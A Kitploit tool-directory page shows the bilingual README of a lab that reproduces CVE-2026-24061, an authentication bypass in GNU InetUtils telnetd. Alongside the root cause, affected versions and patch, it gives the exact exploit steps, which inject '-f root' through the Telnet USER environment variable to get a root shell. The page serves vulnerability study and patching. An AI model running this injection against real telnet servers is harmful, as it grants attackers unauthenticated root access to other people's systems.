Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-24061-lab — CVE-2026-24061 的复现实验室,该漏洞是 GNU InetUtils telnetd 中的身份验证绕过。提供基于 Vagrant 的隔离环境以及分步利用说明,以演示 root shell 访问权限。 | Kitploit
工具/GitHubGitHub/akpmarcelin/cve-2026-24061-lab
漏洞分析漏洞利用渗透测试身份验证学习与教育实验室与实践
GitHubakpmarcelin/cve-2026-24061-lab

CVE-2026-24061-lab

CVE-2026-24061 的复现实验室,该漏洞是 GNU InetUtils telnetd 中的身份验证绕过。提供基于 Vagrant 的隔离环境以及分步利用说明,以演示 root shell 访问权限。

查看仓库
12个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-24061 — 复现实验室

⚠️ 仅限教育用途。隔离实验环境。

法语见下方


摘要

GNU InetUtils telnetd ≤ 2.7 中存在严重身份验证绕过漏洞(CVSS 9.8)。 通过 Telnet NEW_ENVIRON 选项将 -f root 作为 USER 变量注入, 未认证的攻击者无需任何密码即可获得 root shell。

根本原因

在 Telnet 协商期间从客户端接收到的 USER 变量被直接传递给 /usr/bin/login 而未经过滤:

root@kitploit:~
/usr/bin/login -p -f root

-f 标志指示 login 跳过指定用户的密码验证。 此风险已在 RFC 1572(第 7 节)中记录——然而该漏洞在 inetutils 中持续存在超过十年。

受影响版本

GNU InetUtils telnetd 1.9.3 至 2.7

补丁

升级至 GNU InetUtils ≥ 2.7-2

实验室搭建

本实验室使用 Vagrant 配置一个真实的隔离虚拟机,运行存在漏洞的 telnetd 版本(inetutils 2.5,从源代码编译),尽可能接近真实环境。

要求: 您的机器上已安装 Vagrant + VirtualBox。

root@kitploit:~
git clone https://github.com/agokoli/cve-2026-24061-lab
cd cve-2026-24061-lab
vagrant up

VM 启动后 IP 为 192.168.56.10,telnetd 监听 23 端口。

实验室已配置

利用

从您的宿主机操作:

root@kitploit:~
telnet
telnet> environ define USER "-f root"
telnet> open 192.168.56.10 23

USER 变量在协商阶段(登录提示出现之前)通过 NEW_ENVIRON Telnet 选项注入。

连接到 VM 获取 root shell

参考

  • NVD — CVE-2026-24061
  • RFC 1572 — Telnet 环境选项
  • GNU InetUtils 源代码 — telnetd/sys_term.c

作者

Agokoli



CVE-2026-24061 — Lab de démonstration

⚠️ Usage éducatif uniquement. Environnement isolé.

English above


Résumé

Contournement d'authentification critique (CVSS 9.8) dans GNU InetUtils telnetd ≤ 2.7. En injectant -f root comme valeur de la variable USER via l'option Telnet NEW_ENVIRON, un attaquant non authentifié peut obtenir un shell root sans aucun mot de passe.

Cause racine

La variable USER reçue du client pendant la négociation Telnet est passée directement à /usr/bin/login sans validation :

root@kitploit:~
/usr/bin/login -p -f root

Le flag -f indique à login de ne pas vérifier le mot de passe pour l'utilisateur donné. Ce risque est documenté dans la RFC 1572 (Section 7) — pourtant le bug est resté présent dans inetutils pendant plus d'une décennie.

Versions affectées

GNU InetUtils telnetd 1.9.3 à 2.7

Correctif

Mettre à jour vers GNU InetUtils ≥ 2.7-2

Mise en place du lab

Ce lab utilise Vagrant pour provisionner une vraie VM isolée faisant tourner la version vulnérable de telnetd (inetutils 2.5, compilé depuis les sources), afin d'être au plus proche d'un environnement réel.

Prérequis : Vagrant + VirtualBox installés sur votre machine.

root@kitploit:~
git clone https://github.com/agokoli/cve-2026-24061-lab
cd cve-2026-24061-lab
vagrant up

La VM démarre avec l'IP 192.168.56.10 et telnetd en écoute sur le port 23.

Lab provisionné

Exploitation

Depuis votre machine hôte :

root@kitploit:~
telnet
telnet> environ define USER "-f root"
telnet> open 192.168.56.10 23

La variable USER est injectée via l'option NEW_ENVIRON du protocole Telnet pendant la phase de négociation — avant même l'apparition du prompt login:.

Connexion à la VM Shell root obtenu

Références

  • NVD — CVE-2026-24061
  • RFC 1572 — Telnet Environment Option
  • Code source GNU InetUtils — telnetd/sys_term.c

Auteur

Agokoli

下载工具